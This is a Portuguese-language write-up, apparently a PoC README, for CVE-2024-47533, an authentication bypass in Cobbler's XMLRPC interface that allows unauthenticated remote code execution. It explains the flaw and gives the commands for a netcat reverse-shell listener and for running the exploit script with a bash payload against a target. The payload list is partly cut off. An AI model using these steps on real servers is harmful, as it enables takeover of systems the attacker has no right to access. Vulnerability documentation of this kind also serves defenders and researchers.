
CVE-2024-47533 é uma vulnerabilidade crítica de bypass de autenticação no Cobbler (versões 3.0.0 até antes de 3.2.3 e 3.3.7) que permite execução remota de código não autenticada por meio da interface XMLRPC.
⚠️ Execução Remota de Código Crítica via Bypass de Autenticação no Cobbler
🛠️ Implementação de PoC por @dollarboysushil
O Cobbler, um servidor de instalação Linux que permite a configuração rápida de ambientes de instalação em rede, possui uma vulnerabilidade de autenticação nas versões 3.0.0 até (mas não incluindo) 3.2.3 e 3.3.7. A função utils.get_shared_secret() sempre retorna -1, permitindo que qualquer pessoa se conecte à interface XML-RPC do Cobbler com um nome de usuário vazio ('') e senha -1. Isso permite que um atacante com acesso à rede obtenha controle total do servidor Cobbler. A vulnerabilidade é corrigida nas versões 3.2.3 e 3.3.7.
A vulnerabilidade é causada pelo tratamento inadequado do segredo compartilhado na função utils.get_shared_secret(), que sempre retorna -1, efetivamente contornando a autenticação. Isso permite que qualquer usuário da rede se conecte à interface XMLRPC do Cobbler com credenciais vazias e execute comandos arbitrários.
http://<target>:25151/ — endpoint da API XMLRPC do Cobbler
O script de exploit suporta vários payloads de reverse shell, incluindo:
nc, nc2)Inicie um listener Netcat na sua máquina:
nc -lvnp 4444

Execute o script de exploit CVE-2024-47533-dbs.py.
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

Após a execução bem-sucedida, o reverse shell se conectará de volta ao listener, concedendo ao atacante acesso remoto ao servidor.
